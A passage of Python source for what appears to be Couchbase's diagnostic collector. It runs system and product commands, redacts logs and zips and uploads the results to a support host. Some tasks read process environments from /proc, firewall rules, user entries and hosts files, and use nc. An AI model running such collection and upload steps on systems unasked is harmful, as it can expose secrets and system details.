return ofile
def redact_string(self, istring):
ostring = self.couchbase_log.do("RedactLevel")
ostring += self.regular_log.do(istring)
return ostring
class CouchbaseLogProcessor:
def __init__(self, salt):
self.salt = salt
def do(self, line):
if "RedactLevel" in line:
# salt + salt to maintain consistency with other
# occurrences of hashed salt in the logs.
return 'RedactLevel:partial,HashOfSalt:%s\n' \
% generate_hash(self.salt + self.salt).hexdigest()
else:
return line
class RegularLogProcessor:
rexes = [re.compile('(<ud>)(.+?)(</ud>)'),
# Redact the rest of the line in the case we encounter
# log-redaction-salt. Needed to redact ps output containing sgcollect flags safely.
re.compile('(log-redaction-salt)(.+)')]
def __init__(self, salt):
self.salt = salt
def _hash(self, match):
result = match.group(1)
if match.lastindex == 3:
h = generate_hash(self.salt + match.group(2)).hexdigest()
result += h + match.group(3)
elif match.lastindex == 2:
result += " <redacted>"
return result
def do(self, line):
for rex in self.rexes:
line = rex.sub(self._hash, line)
return line
def generate_hash(val):
return hashlib.sha1(val.encode())
class AltExitC(object):
def __init__(self):
self.list = []
self.lock = threading.Lock()
atexit.register(self.at_exit_handler)
def register(self, f):
self.lock.acquire()
self.register_and_unlock(f)
def register_and_unlock(self, f):
try:
self.list.append(f)
finally:
self.lock.release()
def at_exit_handler(self):
self.lock.acquire()
self.list.reverse()
for f in self.list:
try:
f()
except Exception:
pass
def exit(self, status):
self.at_exit_handler()
os._exit(status)
AltExit = AltExitC()
def log(message, end='\n'):
sys.stderr.write(message + end)
sys.stderr.flush()
class Task(object):
privileged = False
no_header = False
num_samples = 1
interval = 0
def __init__(self, description, command, timeout=None, **kwargs):
self.description = description
self.command = command
self.timeout = timeout
self.__dict__.update(kwargs)
def execute(self, fp):
"""Run the task"""
import subprocess
use_shell = not isinstance(self.command, list)
if "literal" in self.__dict__:
print(self.literal, file=fp)
return 0
env = None
if "addenv" in self.__dict__:
env = os.environ.copy()
env.update(self.addenv)
try:
p = subprocess.Popen(self.command, bufsize=-1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=use_shell, env=env)
except OSError as e:
# if use_shell is False then Popen may raise exception
# if binary is missing. In this case we mimic what
# shell does. Namely, complaining to stderr and
# setting non-zero status code. It's might also
# automatically handle things like "failed to fork due
# to some system limit".
print("Failed to execute %s: %s" % (self.command, e), file=fp)
return 127
p.stdin.close()
from threading import Timer, Event
timer = None
timer_fired = Event()
if self.timeout is not None and hasattr(p, 'kill'):
def on_timeout():
p.kill()
timer_fired.set()
timer = Timer(self.timeout, on_timeout)
timer.start()
try:
while True:
data = p.stdout.read(64 * 1024)
if not data:
break
fp.write(data)
finally:
if timer is not None:
timer.cancel()
timer.join()
# there's a tiny chance that command succeeds just before
# timer is fired; that would result in a spurious timeout
# message
if timer_fired.isSet():
print("`%s` timed out after %s seconds" % (self.command, self.timeout), file=fp)
return p.wait()
def will_run(self):
"""Determine if this task will run on this platform."""
return sys.platform.startswith(tuple(self.platforms))
class PythonTask(object):
"""
A task that takes a python function as an argument rather than an OS command.
These will run on any platform.
"""
privileged = False
no_header = False
num_samples = 1
interval = 0
def __init__(self, description, callable, timeout=None, **kwargs):
self.description = description
self.callable = callable
self.command = "pythontask"
self.timeout = timeout
self.log_exception = False # default to false, may be overridden by val in **kwargs
self.__dict__.update(kwargs)
def execute(self, fp):
"""Run the task"""
print("log_file: {0}. ".format(self.log_file))
try:
result = self.callable()
try:
fp.write(result.encode())
except (UnicodeEncodeError, AttributeError):
fp.write(result)
return 0
except Exception as e:
if self.log_exception:
print("Exception executing python task: {0}".format(e))
return 1
def will_run(self):
"""Determine if this task will run on this platform."""
return True
class TaskRunner(object):
def __init__(self, verbosity=0, default_name="couchbase.log",
tmp_dir=None):
self.files = {}
self.tasks = {}
self.verbosity = verbosity
self.start_time = time.strftime("%Y%m%d-%H%M%S", time.gmtime())
self.default_name = default_name
if not tmp_dir:
tmp_dir = None
else:
tmp_dir = os.path.abspath(os.path.expanduser(tmp_dir))
try:
self.tmpdir = tempfile.mkdtemp(dir=tmp_dir)
except OSError as e:
print("Could not use temporary dir {0}: {1}".format(tmp_dir, e))
sys.exit(1)
# If a dir wasn't passed by --tmp-dir, check if the env var was set and if we were able to use it
if not tmp_dir and os.getenv("TMPDIR") and os.path.split(self.tmpdir)[0] != os.getenv("TMPDIR"):
log("Could not use TMPDIR {0}".format(os.getenv("TMPDIR")))
log("Using temporary dir {0}".format(os.path.split(self.tmpdir)[0]))
AltExit.register(self.finalize)
def finalize(self):
try:
for fp in self.files.items():
fp.close()
except Exception:
pass
shutil.rmtree(self.tmpdir, ignore_errors=True)
def collect_file(self, filename):
"""Add a file to the list of files collected. Used to capture the exact
file (including timestamps) from the Couchbase instance.
filename - Absolute path to file to collect.
"""
if filename not in self.files:
self.files[filename] = open(filename, 'r')
else:
log("Unable to collect file '{0}' - already collected.".format(
filename))
def get_file(self, filename):
if filename in self.files:
fp = self.files[filename]
else:
fp = open(os.path.join(self.tmpdir, filename), 'wb+')
self.files[filename] = fp
return fp
def header(self, fp, title, subtitle):
separator = '=' * 78
message = f"{separator}\n{title}\n{subtitle}\n{separator}\n"
fp.write(message.encode())
def log_result(self, result):
if result == 0:
log("OK")
else:
log("Exit code %d" % result)
def run(self, task):
"""Run a task with a file descriptor corresponding to its log file"""
if task.will_run():
if hasattr(task, 'command_to_print'):
command_to_print = task.command_to_print
else:
command_to_print = task.command
log("%s (%s) - " % (task.description, command_to_print), end='')
if task.privileged and os.getuid() != 0:
log("skipped (needs root privs)")
return
if hasattr(task, 'log_file'):
filename = task.log_file
else:
filename = self.default_name
fp = self.get_file(filename)
if not task.no_header:
self.header(fp, task.description, command_to_print)
for i in range(task.num_samples):
if i > 0:
log("Taking sample %d after %f seconds - " % (i+1, task.interval), end='')
time.sleep(task.interval)
result = task.execute(fp)
self.log_result(result)
fp.flush()
elif self.verbosity >= 2:
log('Skipping "%s" (%s): not for platform %s' % (task.description, task.command_to_print, sys.platform))
def redact_and_zip(self, filename, log_type, salt, node):
files = []
redactor = LogRedactor(salt, self.tmpdir)
for name, fp in self.files.items():
if not (".gz" in name or
"expvars.json" in name or
os.path.basename(name) == "sync_gateway"):
files.append(redactor.redact_file(name, fp.name))
else:
files.append(fp.name)
prefix = f"{log_type}_{node}_{self.start_time}"
self.__make_zip(prefix, filename, files)
def zip(self, filename, log_type, node):
files = [file.name for name, file in self.files.items()]
prefix = f"{log_type}_{node}_{self.start_time}"
self.__make_zip(prefix, filename, files)
def close_all_files(self):
for name, fp in self.files.items():
fp.close()
@staticmethod
def __make_zip(prefix, filename, files):
"""Write all our logs to a zipfile"""
from zipfile import ZipFile, ZIP_DEFLATED
zf = ZipFile(filename, mode='w', compression=ZIP_DEFLATED)
try:
for name in files:
zf.write(name, f"{prefix}/{os.path.basename(name)}")
finally:
zf.close()
class SolarisTask(Task):
platforms = ['sunos5', 'solaris']
class LinuxTask(Task):
platforms = ['linux']
class WindowsTask(Task):
platforms = ['win32', 'cygwin']
class MacOSXTask(Task):
platforms = ['darwin']
class UnixTask(SolarisTask, LinuxTask, MacOSXTask):
platforms = SolarisTask.platforms + LinuxTask.platforms + MacOSXTask.platforms
class AllOsTask(UnixTask, WindowsTask):
platforms = UnixTask.platforms + WindowsTask.platforms
def make_curl_task(name, url, user="", password="", content_postprocessors=[],
timeout=60, log_file="python_curl.log",
**kwargs):
"""
NOTE: this used to use curl but was later reworked to use pure python
in order to be more cross platform, since Windows doesn't ship with curl
The content_postprocessors is a list of functions that:
- Are given a string as their only parameter
- Return a string as their only return value
For example:
def reverser(s):
return s[::-1] # reverse string
They are run in order. This allows for stripping out passwords and other
sensitive info
"""
def python_curl_task():
r = urllib.request.Request(url=url)
if user and len(user) > 0:
base64string = base64.b64encode(bytes('%s:%s' % (user, password),'utf-8'))
r.add_header("Authorization", "Basic %s" % base64string.decode('utf-8'))
try:
response_file_handle = urllib.request.urlopen(r, timeout=timeout)
except urllib.error.URLError as e:
print("WARNING: Error connecting to url {0}: {1}".format(url, e))
response_string = response_file_handle.read()
for content_postprocessor in content_postprocessors:
response_string = content_postprocessor(response_string)
return response_string
return PythonTask(
description=name,
callable=python_curl_task,
log_file=log_file,
**kwargs
)
def add_gzip_file_task(sourcefile_path, salt, content_postprocessors=[]):
"""
Adds the extracted contents of a file to the output zip
The content_postprocessors is a list of functions -- see make_curl_task
"""
def python_add_file_task():
with gzip.open(sourcefile_path, 'r') as infile:
contents = infile.read().decode('utf-8')
for content_postprocessor in content_postprocessors:
contents = content_postprocessor(contents)
redactor = LogRedactor(salt, tempfile.mkdtemp())
contents = redactor.redact_string(contents)
out = io.BytesIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(contents.encode())
return out.getvalue()
log_file = os.path.basename(sourcefile_path)
task = PythonTask(
description="Extracted contents of {0}".format(sourcefile_path),
callable=python_add_file_task,
log_file=log_file,
log_exception=False,
)
task.no_header = True
return task
def add_file_task(sourcefile_path, content_postprocessors=[]):
"""
Adds the contents of a file to the output zip
The content_postprocessors is a list of functions -- see make_curl_task
"""
def python_add_file_task():
with open(sourcefile_path, 'br') as infile:
contents = infile.read()
for content_postprocessor in content_postprocessors:
contents = content_postprocessor(contents)
return contents
task = PythonTask(
description="Contents of {0}".format(sourcefile_path),
callable=python_add_file_task,
log_file=os.path.basename(sourcefile_path),
log_exception=False,
)
return task
def make_query_task(statement, user, password, port):
url = "http://127.0.0.1:%s/query/service?statement=%s" % (port, urllib.parse.quote(statement))
return make_curl_task(name="Result of query statement \'%s\'" % statement,
user=user, password=password, url=url)
def basedir():
mydir = os.path.dirname(sys.argv[0])
if mydir == "":
mydir = "."
return mydir
def make_event_log_task():
from datetime import datetime, timedelta
# I found that wmic ntevent can be extremely slow; so limiting the output
# to approximately last month
limit = datetime.today() - timedelta(days=31)
limit = limit.strftime('%Y%m%d000000.000000-000')
return WindowsTask("Event log",
"wmic ntevent where "
"\""
"(LogFile='application' or LogFile='system') and "
"EventType<3 and TimeGenerated>'%(limit)s'"
"\" "
"get TimeGenerated,LogFile,SourceName,EventType,Message "
"/FORMAT:list" % locals())
def make_event_log_task_sg_info():
from datetime import datetime, timedelta
# I found that wmic ntevent can be extremely slow; so limiting the output
# to approximately last month
limit = datetime.today() - timedelta(days=31)
limit = limit.strftime('%Y%m%d000000.000000-000')
return WindowsTask("SG Event log",
"wmic ntevent where "
"\""
"SourceName='SyncGateway' and "
"TimeGenerated>'%(limit)s'"
"\" "
"get TimeGenerated,LogFile,SourceName,EventType,Message "
"/FORMAT:list" % locals())
def make_os_tasks(processes):
programs = " ".join(processes)
_tasks = [
UnixTask("uname", "uname -a"),
UnixTask("time and TZ", "date; date -u"),
UnixTask("ntp time",
"ntpdate -q pool.ntp.org || "
"nc time.nist.gov 13 || "
"netcat time.nist.gov 13", timeout=60),
UnixTask("ntp peers", "ntpq -p"),
UnixTask("raw /etc/sysconfig/clock", "cat /etc/sysconfig/clock"),
UnixTask("raw /etc/timezone", "cat /etc/timezone"),
WindowsTask("System information", "systeminfo"),
WindowsTask("Computer system", "wmic computersystem"),
WindowsTask("Computer OS", "wmic os"),
LinuxTask("System Hardware", "lshw -json || lshw"),
SolarisTask("Process list snapshot", "prstat -a -c -n 100 -t -v -L 1 10"),
SolarisTask("Process list", "ps -ef"),
SolarisTask("Service configuration", "svcs -a"),
SolarisTask("Swap configuration", "swap -l"),
SolarisTask("Disk activity", "zpool iostat 1 10"),
SolarisTask("Disk activity", "iostat -E 1 10"),
LinuxTask("Process list snapshot", "export TERM=''; top -Hb -n1 || top -H n1"),
LinuxTask("Process list", "ps -AwwL -o user,pid,lwp,ppid,nlwp,pcpu,maj_flt,min_flt,pri,nice,vsize,rss,tty,stat,wchan:12,start,bsdtime,command"),
LinuxTask("Raw /proc/vmstat", "cat /proc/vmstat"),
LinuxTask("Raw /proc/mounts", "cat /proc/mounts"),
LinuxTask("Raw /proc/partitions", "cat /proc/partitions"),
LinuxTask("Raw /proc/diskstats", "cat /proc/diskstats; echo ''", num_samples=10, interval=1),
LinuxTask("Raw /proc/interrupts", "cat /proc/interrupts"),
LinuxTask("Swap configuration", "free -t"),
LinuxTask("Swap configuration", "swapon -s"),
LinuxTask("Kernel modules", "lsmod"),
LinuxTask("Distro version", "cat /etc/redhat-release"),
LinuxTask("Distro version", "lsb_release -a"),
LinuxTask("Distro version", "cat /etc/SuSE-release"),
LinuxTask("Distro version", "cat /etc/issue"),
LinuxTask("Installed software", "rpm -qa"),
# NOTE: AFAIK columns _was_ necessary, but it doesn't appear to be
# required anymore. I.e. dpkg -l correctly detects stdout as not a
# tty and stops playing smart on formatting. Lets keep it for few
# years and then drop, however.
LinuxTask("Installed software", "COLUMNS=300 dpkg -l"),
LinuxTask("Extended iostat", "iostat -x -p ALL 1 10 || iostat -x 1 10"),
LinuxTask("Core dump settings", "find /proc/sys/kernel -type f -name '*core*' -print -exec cat '{}' ';'"),
UnixTask("sysctl settings", "sysctl -a"),
LinuxTask("Relevant lsof output",
"echo %(programs)s | xargs -n1 pgrep | xargs -n1 -r -- lsof -n -p" % locals()),
LinuxTask("LVM info", "lvdisplay"),
LinuxTask("LVM info", "vgdisplay"),
LinuxTask("LVM info", "pvdisplay"),
MacOSXTask("Process list snapshot", "top -l 1"),
MacOSXTask("Disk activity", "iostat 1 10"),
MacOSXTask("Process list",
"ps -Aww -o user,pid,lwp,ppid,nlwp,pcpu,pri,nice,vsize,rss,tty,"
"stat,wchan:12,start,bsdtime,command"),
WindowsTask("Installed software", "wmic product get name, version"),
WindowsTask("Service list", "wmic service where state=\"running\" GET caption, name, state"),
WindowsTask("Process list", "wmic process"),
WindowsTask("Process usage", "tasklist /V /fo list"),
WindowsTask("Swap settings", "wmic pagefile"),
WindowsTask("Disk partition", "wmic partition"),
WindowsTask("Disk volumes", "wmic volume"),
UnixTask("Network configuration", "ifconfig -a", interval=10,
num_samples=2),
LinuxTask("Network configuration", "echo link addr neigh rule route netns | xargs -n1 -- sh -x -c 'ip $1 list' --"),
WindowsTask("Network configuration", "ipconfig /all", interval=10,
num_samples=2),
LinuxTask("Raw /proc/net/dev", "cat /proc/net/dev"),
LinuxTask("Network link statistics", "ip -s link"),
UnixTask("Network status", "netstat -anp || netstat -an"),
WindowsTask("Network status", "netstat -ano"),
AllOsTask("Network routing table", "netstat -rn"),
LinuxTask("Network socket statistics", "ss -an"),
LinuxTask("Extended socket statistics", "ss -an --info --processes"),
UnixTask("Arp cache", "arp -na"),
LinuxTask("Iptables dump", "iptables-save"),
UnixTask("Raw /etc/hosts", "cat /etc/hosts"),
UnixTask("Raw /etc/resolv.conf", "cat /etc/resolv.conf"),
UnixTask("Raw /etc/nsswitch.conf", "cat /etc/nsswitch.conf"),
WindowsTask("Arp cache", "arp -a"),
WindowsTask("Network Interface Controller", "wmic nic"),
WindowsTask("Network Adapter", "wmic nicconfig"),
WindowsTask("Active network connection", "wmic netuse"),
WindowsTask("Protocols", "wmic netprotocol"),
WindowsTask("Hosts file", "type %SystemRoot%\system32\drivers\etc\hosts"),
WindowsTask("Cache memory", "wmic memcache"),
WindowsTask("Physical memory", "wmic memphysical"),
WindowsTask("Physical memory chip info", "wmic memorychip"),
WindowsTask("Local storage devices", "wmic logicaldisk"),
UnixTask("Filesystem", "df -ha"),
UnixTask("System activity reporter", "sar 1 10"),
UnixTask("System paging activity", "vmstat 1 10"),
UnixTask("System uptime", "uptime"),
UnixTask("couchbase user definition", "getent passwd couchbase"),
UnixTask("couchbase user limits", "su couchbase -c \"ulimit -a\"",
privileged=True),
UnixTask("sync_gateway user definition", "getent passwd sync_gateway"),
UnixTask("sync_gateway user limits", "su sync_gateway -c \"ulimit -a\"",
privileged=True),
UnixTask("Interrupt status", "intrstat 1 10"),
UnixTask("Processor status", "mpstat 1 10"),
UnixTask("System log", "cat /var/adm/messages"),
LinuxTask("Raw /proc/uptime", "cat /proc/uptime"),
LinuxTask("Systemd journal", "journalctl 2>&1 | gzip -c",
log_file="systemd_journal.gz", no_header=True),
LinuxTask("All logs", "tar cz /var/log/syslog* /var/log/dmesg /var/log/messages* /var/log/daemon* /var/log/debug* /var/log/kern.log* 2>/dev/null",
log_file="syslog.tar.gz", no_header=True),
LinuxTask("Relevant proc data", "echo %(programs)s | "
"xargs -n1 pgrep | xargs -n1 -- sh -c 'echo $1; cat /proc/$1/status; cat /proc/$1/limits; cat /proc/$1/smaps; cat /proc/$1/numa_maps; cat /proc/$1/task/*/sched; echo' --" % locals()),
LinuxTask("Processes' environment", "echo %(programs)s | "
r"xargs -n1 pgrep | xargs -n1 -- sh -c 'echo $1; ( cat /proc/$1/environ | tr \\0 \\n ); echo' --" % locals()),
LinuxTask("NUMA data", "numactl --hardware"),
LinuxTask("NUMA data", "numactl --show"),
LinuxTask("NUMA data", "cat /sys/devices/system/node/node*/numastat"),
UnixTask("Kernel log buffer", "dmesg -H || dmesg"),
LinuxTask("Transparent Huge Pages data", "cat /sys/kernel/mm/transparent_hugepage/enabled"),
LinuxTask("Transparent Huge Pages data", "cat /sys/kernel/mm/transparent_hugepage/defrag"),
LinuxTask("Transparent Huge Pages data", "cat /sys/kernel/mm/redhat_transparent_hugepage/enabled"),
LinuxTask("Transparent Huge Pages data", "cat /sys/kernel/mm/redhat_transparent_hugepage/defrag"),
LinuxTask("Network statistics", "netstat -s"),
LinuxTask("Full raw netstat", "cat /proc/net/netstat"),
LinuxTask("CPU throttling info", "echo /sys/devices/system/cpu/cpu*/thermal_throttle/* | xargs -n1 -- sh -c 'echo $1; cat $1' --"),
make_event_log_task(),
make_event_log_task_sg_info(),
]
return _tasks
# stolen from http://rightfootin.blogspot.com/2006/09/more-on-python-flatten.html
def iter_flatten(iterable):
it = iter(iterable)
for e in it:
if isinstance(e, (list, tuple)):
for f in iter_flatten(e):
yield f
else:
yield e
def flatten(iterable):
return [e for e in iter_flatten(iterable)]
def read_guts(guts, key):
return guts.get(key, "")
def winquote_path(s):
return '"'+s.replace("\\\\", "\\").replace('/', "\\")+'"'
# python's split splits empty string to [''] which doesn't make any
# sense. So this function works around that.
def correct_split(string, splitchar):
rv = string.split(splitchar)
if rv == ['']:
rv = []
return rv
def make_stats_archives_task(guts, initargs_path):
escript = exec_name("escript")
escript_wrapper = find_script("escript-wrapper")
dump_stats = find_script("dump-stats")
stats_dir = read_guts(guts, "stats_dir")
if dump_stats is None or escript_wrapper is None or not stats_dir:
return []
return AllOsTask("stats archives",
[escript,
escript_wrapper,
"--initargs-path", initargs_path, "--",
dump_stats, stats_dir],
no_header=True,
log_file="stats_archives.json")
def make_product_task(guts, initargs_path, options):
root = os.path.abspath(os.path.join(initargs_path, "..", "..", "..", ".."))
dbdir = read_guts(guts, "db_dir")
viewdir = read_guts(guts, "idx_dir")
diag_url = "http://127.0.0.1:%s/diag?noLogs=1" % read_guts(guts, "rest_port")
if options.single_node_diag:
diag_url += "&oneNode=1"
from distutils.spawn import find_executable
lookup_cmd = None
for cmd in ["dig", "nslookup", "host"]:
if find_executable(cmd) is not None:
lookup_cmd = cmd
break
lookup_tasks = []
if lookup_cmd is not None:
lookup_tasks = [UnixTask("DNS lookup information for %s" % node,
"%(lookup_cmd)s '%(node)s'" % locals())
for node in correct_split(read_guts(guts, "nodes"), ",")]
query_tasks = []
query_port = read_guts(guts, "query_port")
if query_port:
def make(statement):
return make_query_task(statement, user="@",
password=read_guts(guts, "memcached_pass"),
port=query_port)
query_tasks = [make("SELECT * FROM system:datastores"),
make("SELECT * FROM system:namespaces"),
make("SELECT * FROM system:keyspaces"),
make("SELECT * FROM system:indexes")]
index_tasks = []
index_port = read_guts(guts, "indexer_http_port")
if index_port:
url = 'http://127.0.0.1:%s/getIndexStatus' % index_port
index_tasks = [make_curl_task(name="Index definitions are: ",
user="@", password=read_guts(guts, "memcached_pass"), url=url)]
fts_tasks = []
fts_port = read_guts(guts, "fts_http_port")
if fts_port:
url = 'http://127.0.0.1:%s/api/diag' % fts_port
fts_tasks = [make_curl_task(name="FTS /api/diag: ",
user="@", password=read_guts(guts, "memcached_pass"), url=url)]
_tasks = [
UnixTask("Directory structure",
["ls", "-lRai", root]),
UnixTask("Database directory structure",
["ls", "-lRai", dbdir]),
UnixTask("Index directory structure",
["ls", "-lRai", viewdir]),
UnixTask("couch_dbinfo",
["find", dbdir, "-type", "f",
"-name", "*.couch.*",
"-exec", "couch_dbinfo", "{}", "+"]),
LinuxTask("Database directory filefrag info",
["find", dbdir, "-type", "f", "-exec", "filefrag", "-v", "{}", "+"]),
LinuxTask("Index directory filefrag info",
["find", viewdir, "-type", "f", "-exec", "filefrag", "-v", "{}", "+"]),
WindowsTask("Database directory structure",
"dir /s " + winquote_path(dbdir)),
WindowsTask("Index directory structure",
"dir /s " + winquote_path(viewdir)),
WindowsTask("Version file",
"type " + winquote_path(basedir()) + "\\..\\VERSION.txt"),
WindowsTask("Manifest file",
"type " + winquote_path(basedir()) + "\\..\\manifest.txt"),
WindowsTask("Manifest file",
"type " + winquote_path(basedir()) + "\\..\\manifest.xml"),
LinuxTask("Version file", "cat '%s/VERSION.txt'" % root),
LinuxTask("Manifest file", "cat '%s/manifest.txt'" % root),
LinuxTask("Manifest file", "cat '%s/manifest.xml'" % root),
AllOsTask("Couchbase config", "", literal=read_guts(guts, "ns_config")),
AllOsTask("Couchbase static config", "", literal=read_guts(guts, "static_config")),
AllOsTask("Raw ns_log", "", literal=read_guts(guts, "ns_log")),
# TODO: just gather those in python
WindowsTask("Memcached logs",
"cd " + winquote_path(read_guts(guts, "memcached_logs_path")) + " && " +
"for /f %a IN ('dir /od /b memcached.log.*') do type %a",
log_file="memcached.log"),
UnixTask("Memcached logs",
["sh", "-c", 'cd "$1"; for file in $(ls -tr memcached.log.*); do cat \"$file\"; done', "--", read_guts(guts, "memcached_logs_path")],
log_file="memcached.log"),
[WindowsTask("Ini files (%s)" % p,
"type " + winquote_path(p),
log_file="ini.log")
for p in read_guts(guts, "couch_inis").split(";")],
UnixTask("Ini files",
["sh", "-c", 'for i in "$@"; do echo "file: $i"; cat "$i"; done', "--"] + read_guts(guts, "couch_inis").split(";"),
log_file="ini.log"),
make_curl_task(name="couchbase diags",
user="@",
password=read_guts(guts, "memcached_pass"),
timeout=600,
url=diag_url,
log_file="diag.log"),
make_curl_task(name="master events",
user="@",
password=read_guts(guts, "memcached_pass"),
timeout=300,
url='http://127.0.0.1:%s/diag/masterEvents?o=1' % read_guts(guts, "rest_port"),
log_file="master_events.log",
no_header=True),
make_curl_task(name="ale configuration",
user="@",
password=read_guts(guts, "memcached_pass"),
url='http://127.0.0.1:%s/diag/ale' % read_guts(guts, "rest_port"),
log_file="couchbase.log"),
[AllOsTask("couchbase logs (%s)" % name, "cbbrowse_logs %s" % name,
addenv=[("REPORT_DIR", read_guts(guts, "log_path"))],
log_file="ns_server.%s" % name)
for name in ["debug.log", "info.log", "error.log", "couchdb.log",
"xdcr.log", "xdcr_errors.log",
"views.log", "mapreduce_errors.log",
"stats.log", "babysitter.log", "ssl_proxy.log",
"reports.log", "xdcr_trace.log", "http_access.log",
"http_access_internal.log", "ns_couchdb.log",
"goxdcr.log", "query.log", "projector.log", "indexer.log",
"fts.log", "metakv.log"]],
[AllOsTask("memcached stats %s" % kind,
flatten(["cbstats", "-a", "127.0.0.1:%s" % read_guts(guts, "memcached_port"), kind, "-b", read_guts(guts, "memcached_admin"), "-p", read_guts(guts, "memcached_pass")]),
log_file="stats.log",
timeout=60)
for kind in ["all", "allocator", "checkpoint", "config",
"dcp", "dcpagg",
["diskinfo", "detail"], ["dispatcher", "logs"],
"failovers", ["hash", "detail"],
"kvstore", "kvtimings", "memory",
"prev-vbucket",
"runtimes", "scheduler",
"tap", "tapagg",
"timings", "uuid",
"vbucket", "vbucket-details", "vbucket-seqno",
"warmup", "workload"]],
[AllOsTask("memcached mcstat %s" % kind,
flatten(["mcstat", "-h", "127.0.0.1:%s" % read_guts(guts, "memcached_port"),
"-u", read_guts(guts, "memcached_admin"),
"-P", read_guts(guts, "memcached_pass"), kind]),
log_file="stats.log",
timeout=60)
for kind in ["connections"]],
[AllOsTask("ddocs for %s (%s)" % (bucket, path),
["couch_dbdump", path],
log_file="ddocs.log")
for bucket in set(correct_split(read_guts(guts, "buckets"), ",")) - set(correct_split(read_guts(guts, "memcached_buckets"), ","))
for path in glob.glob(os.path.join(dbdir, bucket, "master.couch*"))],
[AllOsTask("replication docs (%s)" % (path),
["couch_dbdump", path],
log_file="ddocs.log")
for path in glob.glob(os.path.join(dbdir, "_replicator.couch*"))],
[AllOsTask("Couchstore local documents (%s, %s)" % (bucket, os.path.basename(path)),
["couch_dbdump", "--local", path],
log_file="couchstore_local.log")
for bucket in set(correct_split(read_guts(guts, "buckets"), ",")) - set(correct_split(read_guts(guts, "memcached_buckets"), ","))
for path in glob.glob(os.path.join(dbdir, bucket, "*.couch.*"))],
[UnixTask("moxi stats (port %s)" % port,
"echo stats proxy | nc 127.0.0.1 %s" % port,
log_file="stats.log",
timeout=60)
for port in correct_split(read_guts(guts, "moxi_ports"), ",")],
[AllOsTask("mctimings",
["mctimings",
"-u", read_guts(guts, "memcached_admin"),
"-P", read_guts(guts, "memcached_pass"),
"-h", "127.0.0.1:%s" % read_guts(guts, "memcached_port"),
"-v"] + stat,
log_file="stats.log",
timeout=60)
for stat in ([], ["subdoc_execute"])],
make_stats_archives_task(guts, initargs_path)
]
_tasks = flatten([lookup_tasks, query_tasks, index_tasks, fts_tasks, _tasks])
return _tasks
def find_script(name):
dirs = [basedir(), os.path.join(basedir(), "scripts")]
for d in dirs:
path = os.path.join(d, name)
if os.path.exists(path):
log("Found %s: %s" % (name, path))
return path
return None
def get_server_guts(initargs_path):
dump_guts_path = find_script("dump-guts")
if dump_guts_path is None:
log("Couldn't find dump-guts script. Some information will be missing")
return {}
escript = exec_name("escript")
extra_args = os.getenv("EXTRA_DUMP_GUTS_ARGS")
args = [escript, dump_guts_path, "--initargs-path", initargs_path]
if extra_args:
args = args + extra_args.split(";")
print("Checking for server guts in %s..." % initargs_path)
p = subprocess.Popen(args, stdout=subprocess.PIPE)
output = p.stdout.read()
p.wait()
# print("args: %s gave rc: %d and:\n\n%s\n" % (args, rc, output))
tokens = output.rstrip("\0").split("\0")
d = {}
if len(tokens) > 1:
for i in range(0, len(tokens), 2):
d[tokens[i]] = tokens[i+1]
return d
def guess_utility(command):
if isinstance(command, list):
command = ' '.join(command)
if not command:
return None
if re.findall(r'[|;&]|\bsh\b|\bsu\b|\bfind\b|\bfor\b', command):
# something hard to easily understand; let the human decide
return command
else:
return command.split()[0]
def dump_utilities(*args, **kwargs):
specific_platforms = {SolarisTask: 'Solaris',
LinuxTask: 'Linux',
WindowsTask: 'Windows',
MacOSXTask: 'Mac OS X'}
platform_utils = dict((name, set()) for name in list(specific_platforms.values()))
class FakeOptions(object):
def __getattr__(self, name):
return None
tasks = make_os_tasks() + make_product_task({}, "", FakeOptions())
for task in tasks:
utility = guess_utility(task.command)
if utility is None:
continue
for (platform, name) in list(specific_platforms.items()):
if isinstance(task, platform):
platform_utils[name].add(utility)
print("This is an autogenerated, possibly incomplete and flawed list of utilites used by cbcollect_info")
for (name, utilities) in sorted(list(platform_utils.items()), key=lambda x: x[0]):
print("\n%s:" % name)
for utility in sorted(utilities):
print(" - %s" % utility)
sys.exit(0)
def setup_stdin_watcher():
def _in_thread():
sys.stdin.readline()
AltExit.exit(2)
th = threading.Thread(target=_in_thread)
th.setDaemon(True)
th.start()
class CurlKiller:
def __init__(self, p):
self.p = p
def cleanup(self):
if self.p is not None:
print("Killing curl...")
os.kill(self.p.pid, signal.SIGKILL)
print("done")
def disarm(self):
self.p = None
def do_upload_and_exit(path, url, proxy):
f = open(path, 'rb')
# mmap the file to reduce the amount of memory required (see bit.ly/2aNENXC)
filedata = mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)
# Get proxies from environment/system
proxy_handler = urllib.request.ProxyHandler(urllib.request.getproxies())
if proxy != "":
# unless a proxy is explicitly passed, then use that instead
proxy_handler = urllib.request.ProxyHandler({'https': proxy, 'http': proxy})
opener = urllib.request.build_opener(proxy_handler)
request = urllib.request.Request(url, data=filedata.read(), method='PUT')
request.add_header(str('Content-Type'), str('application/zip'))
exit_code = 0
try:
url = opener.open(request)
if url.getcode() == 200:
log('Done uploading')
else:
raise Exception('Error uploading, expected status code 200, got status code: {0}'.format(url.getcode()))
except Exception as e:
log(traceback.format_exc())
exit_code = 1
filedata.close()
f.close()
sys.exit(exit_code)
def parse_host(host):
url = urllib.parse.urlsplit(host)
if not url.scheme:
url = urllib.parse.urlsplit('https://' + host)
return url.scheme, url.netloc, url.path
def generate_upload_url(parser, options, zip_filename):
upload_url = None
if options.upload_host:
if not options.upload_customer:
parser.error("Need --customer when --upload-host is given")
scheme, netloc, path = parse_host(options.upload_host)
customer = urllib.parse.quote(options.upload_customer)
fname = urllib.parse.quote(os.path.basename(zip_filename))
if options.upload_ticket:
full_path = '%s/%s/%d/%s' % (path, customer, options.upload_ticket, fname)
else:
full_path = '%s/%s/%s' % (path, customer, fname)
upload_url = urllib.parse.urlunsplit((scheme, netloc, full_path, '', ''))
log("Will upload collected .zip file into %s" % upload_url)
return upload_url
def check_ticket(option, opt, value):
if re.match('^\d{1,7}$', value):
return int(value)
else:
raise optparse.OptionValueError(
"option %s: invalid ticket number: %r" % (opt, value))
class CbcollectInfoOptions(optparse.Option):
from copy import copy
TYPES = optparse.Option.TYPES + ("ticket",)
TYPE_CHECKER = copy(optparse.Option.TYPE_CHECKER)
TYPE_CHECKER["ticket"] = check_ticket
def find_primary_addr(default=None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
try:
s.connect(("8.8.8.8", 56))
